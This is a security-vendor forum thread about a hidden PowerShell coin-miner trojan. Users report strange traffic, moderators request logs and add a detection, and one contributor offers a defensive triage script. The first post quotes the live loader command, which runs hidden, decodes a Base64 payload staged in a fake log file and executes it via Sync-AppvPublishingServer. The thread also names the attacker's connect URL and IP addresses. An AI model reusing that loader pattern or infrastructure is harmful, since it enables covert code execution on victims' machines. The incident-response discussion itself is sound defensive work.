Kevin999 Posted April 25, 2022 (edited)

Yesterday, I found some strange internet traffic while I was using Wireshark. Then I used the EIS "network connections" tool and found it was created by PowerShell (I didn't run any PowerShell). The issue reproduced today. Conhost.exe and powershell.exe were running in the background, but I didn't run either of them. PowerShell connected to [2606:4700:3031::ac43:9c07]:80 (the same today as yesterday); conhost doesn't seem to have any network activity. I used Wireshark to capture packets, then used the filter ipv6.addr==2606:4700:3031::ac43:9c07, and found it was using HTTP/1.1 with the CONNECT method. Please note the strange strings in X-User-Agent. By the way, the TLS (TCP 443) and QUIC (UDP 443) connections were created when I used sandboxed Firefox to visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL visiting them !!!); these websites use Cloudflare to protect themselves. I used ESET SysInspector to capture a snapshot. I used nslookup to resolve:

C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
DNS request timed out.
    timeout was 2 seconds.
服务器: UnKnown
Address: 192.168.1.1

DNS request timed out.
    timeout was 2 seconds.
*** 请求 UnKnown 超时

C:\Users\Admin>nslookup api.private-chatting.com
DNS request timed out.
    timeout was 2 seconds.
服务器: UnKnown
Address: 192.168.1.1

非权威应答:
名称: api.private-chatting.com
Addresses: 2606:4700:3032::6815:38d6
          2606:4700:3031::ac43:9c07
          104.21.56.214

Today I found the command-line parameters of one of the powershell.exe processes via Task Manager (it was using about 10% CPU):

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

2. Find C:\Windows\logs\system-logs.txt and look for these strings. Snipped: the code was moved to the attached file to shorten the post.

Please note $EndPointURL = "hxxp://api.private-chatting.com/connect"; it is the same as the URL in the pcapng file.

Attachments: system-logs.txt, Strange traffic_20220424.rar, system-logs.rar

Edited April 25, 2022 by Marcos: script moved to an attached file
Kevin999 (Author) Posted April 25, 2022

I also used ESET SysInspector to capture a snapshot; I can upload it if needed.
Marcos (Administrator) Posted April 25, 2022

A detection will be added: PowerShell/Agent.GZ trojan
ca81 Posted April 27, 2022

Hi, I have the same process. How do I remove it? I tried disabling PowerShell etc., but nothing. I have blocked the IP in the firewall; now the same thing happens with a new one. How can I remove it, please??? Thanks. I ran NOD32 but it found nothing.

2606:4700:3032::6815:38d6:80
Marcos (Administrator) Posted April 27, 2022

You should find out which PowerShell script was executed. Most likely it's legitimate, which is also why it wasn't detected, and there's no reason to be concerned. Please provide logs collected with ESET Log Collector for a check.
itman Posted April 27, 2022 (edited)

47 minutes ago, ca81 said: 2606:4700:3032::6815:38d6:80

Notice the remote IPv6 address is the same as the one previously posted that was detected performing coin-mining activity. Also, it is not normal Windows system behavior to see PowerShell running as a stand-alone task for an extended period of time.

Edited April 27, 2022 by itman
itman Posted April 27, 2022

In regard to the PowerShell code posted earlier: the attacker previously dropped the coinminer code file in the highlighted Windows log file directory. The attacker is creating an App-V process remotely using Sync-AppvPublishingServer.
Soul Posted April 28, 2022

I am going through the exact same thing, and if this is indeed malicious, what could be done to remove it? Could you possibly give a solution, please? Thank you!
Marcos (Administrator) Posted April 28, 2022

3 minutes ago, Soul said: I am going through the exact same thing, and if this is indeed malicious, what could be done to remove it? Could you possibly give a solution, please? Thank you!

Please provide logs collected with ESET Log Collector for a start.
Soul Posted April 28, 2022 (edited)

It is exactly the same stuff as above. Exact same IP addresses and the api.chatting thing. Exact same shell command that is causing PowerShell to run in the background. What itman posted is the shell command being executed.

Edited April 28, 2022 by Soul
Marcos (Administrator) Posted April 28, 2022

C:\Windows\logs\system-logs.txt should be detected. Please scan it with ESET. If it is not detected, please supply it to me.
Soul Posted April 28, 2022 (edited)

It was not detected.

Edited April 28, 2022 by Soul
Soul Posted April 28, 2022

Sorry, I'm a little confused. Which log file should I be giving you? I scanned the system_log file with ESET and it said it was fine.
Marcos (Administrator) Posted April 28, 2022

Let's start off by providing logs collected with ESET Log Collector.
Soul Posted April 28, 2022

Yeah, I could do that. Also, to add to this, I restarted my computer and ESET did block the script that was running, but I want more of a permanent solution if that's possible, to fully remove whatever is initiating that script to begin with.
Marcos (Administrator) Posted April 28, 2022

23 minutes ago, Soul said: Yeah, I could do that. Also, to add to this, I restarted my computer and ESET did block the script that was running, but I want more of a permanent solution if that's possible, to fully remove whatever is initiating that script to begin with.

According to the logs provided, you don't have ESET installed. On the other hand, there's an install log from yesterday that reads:

(SERVER) MSI (s) (80:C4) [22:51:31:369]: Product: ESET Security -- Installation completed successfully.
(SERVER) MSI (s) (80:C4) [22:51:31:370]: Windows Installer installed the product. Product Name: ESET Security. Product Version: 15.1.12.0. Product Language: 1033. Manufacturer: ESET, spol. s r.o.. Installation success or error status: 0.

That said, it looks like ESET was uninstalled prior to collecting the logs.
Soul Posted April 28, 2022

I did, but I removed it because I wanted to see if the script it blocked was permanent or temporary, and I couldn't turn it off, so I uninstalled it and the script executed.
Soul Posted April 28, 2022

I just installed ESET again and am now running the log collector.
Soul Posted April 28, 2022

I'm unable to send it; it's 200 MB.
Marcos (Administrator) Posted April 28, 2022

You can upload it to a file sharing service, such as OneDrive, Dropbox, etc., and drop me a private message with a download link.
itman Posted April 28, 2022 (edited)

7 hours ago, Marcos said: This is an actual log. Did you send a correct file?

Assume the file containing the Base64-encrypted coinminer code could be dropped anywhere. The attacker could actually now be creating a diversion where he is dropping two files, one being a legit system-logs.txt log file. Also assume that since the file dropping is occurring prior to PowerShell execution, the coinminer code is being altered to defeat signature detection.

It appears to me a reverse shell has been created which is the source of the above activity. The key to stopping this coinminer is to find the reverse shell and create a sig. for it, most likely for the attacker IP address being dialed out to.

My advice is to create an ESET HIPS ask rule to monitor PowerShell.exe startup. Make sure alerting and a log level of warning are specified. Hopefully this will point to what is running the script. Not sure here if the HIPS will detect the remote execution of the script. This HIPS ask rule should not cause issues for home users, who would not be deploying PowerShell scripts for anything.

Edited April 28, 2022 by itman
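An added triage script, written here and not taken from any post in the thread, that covers both the loader command line Kevin999 posted and itman's advice to watch powershell.exe startup: it lists running powershell.exe processes whose command line carries the indicators from that post, reports their parent process so the launcher can be identified, and decodes the staged Base64 line from C:\Windows\logs\system-logs.txt for inspection only, without executing it. It assumes an elevated PowerShell 5.1 session; the file path, indicator strings and line index 17033 are taken from the thread.

```powershell
# Added example, not from the thread. Run from an elevated PowerShell 5.1 session.
# Path, indicator strings and line index come from the command line posted by Kevin999.
$LogFile    = 'C:\Windows\logs\system-logs.txt'
$LineIndex  = 17033
$Indicators = @('-WindowStyle Hidden', 'FromBase64String', 'Sync-AppvPublishingServer', 'system-logs.txt')

function Get-SuspiciousPowerShell {
    # Flag running powershell.exe whose command line matches at least two indicators,
    # and record the parent so the process that launches the loader can be identified.
    Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" | ForEach-Object {
        $cmd  = $_.CommandLine
        $hits = @($Indicators | Where-Object { $cmd -and $cmd -like "*$_*" })
        if ($hits.Count -ge 2) {
            $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($_.ParentProcessId)"
            $parentName = '(exited)'
            $parentCmd  = $null
            if ($parent) { $parentName = $parent.Name; $parentCmd = $parent.CommandLine }
            [pscustomobject]@{
                ProcessId   = $_.ProcessId
                ParentId    = $_.ParentProcessId
                ParentName  = $parentName
                ParentCmd   = $parentCmd
                Indicators  = $hits -join ', '
                CommandLine = $cmd
            }
        }
    }
}

function ConvertFrom-StagedLine {
    # Decode the Base64 line the loader reads, for inspection only; nothing is executed.
    param([string]$Path, [int]$Index)
    $line = Get-Content -Path $Path | Select-Object -Index $Index
    if (-not $line) { return "no line at index $Index" }
    try   { [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($line)) }
    catch { "line $Index is not valid Base64" }
}

Get-SuspiciousPowerShell | Format-List
if (Test-Path -Path $LogFile) {
    Get-FileHash -Algorithm SHA256 -Path $LogFile      # hash to include when submitting the sample
    $decoded = ConvertFrom-StagedLine -Path $LogFile -Index $LineIndex
    $decoded.Substring(0, [Math]::Min(500, $decoded.Length))   # preview the head of the decoded script
}
```

The ParentName and ParentCmd fields are what to look at when deciding where to set the HIPS rule: a scheduled task, service host or App-V host as parent narrows the persistence search considerably.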
itman Posted April 28, 2022 (edited)

I am also going to perform a "connecting of the dots" exercise here:

1. The PowerShell script is signed.
2. The IP addresses being used track to Cloudflare.
3. Incident reports to date are from China, France, and the U.S.
4. The OP who started the thread stated a CPU usage spike of 10%, a low rate for coin miners.
5. PowerShell execution is not hidden in the least.

Putting it all together strongly points to a legit software install that is performing coin mining. Hell, even Norton AV is doing it currently: https://www.theverge.com/2022/1/7/22869528/norton-crypto-miner-security-software-reaction

Edited April 28, 2022 by itman
itman Posted April 28, 2022 (edited)

Another thing I noticed from the OP's screenshot of running tasks is that he has VMware installed. The PowerShell script is loading the AppVClient. Finally, VMware has recent postings of RCE vulnerabilities: https://www.vmware.com/security/advisories/VMSA-2022-0010.html . One of these RCE vulnerabilities is currently being exploited: https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html and PowerShell is part of the attack. More details here:

Quote: Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation. Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons. With privileged access, these types of attacks may be able to bypass typical defenses including antivirus (AV) and endpoint detection and response (EDR).

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor

Edited April 28, 2022 by itman
Marcos (Administrator) Posted April 29, 2022

The OP has just installed ESET and it detected PowerShell malware. Since then I haven't heard whether the threat has been resolved or not.
Kevin999 (Author) Posted April 29, 2022 (edited)

1 hour ago, Marcos said: The OP has just installed ESET and it detected PowerShell malware. Since then I haven't heard whether the threat has been resolved or not.

The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it was no longer detected after that.

Edited April 29, 2022 by Kevin999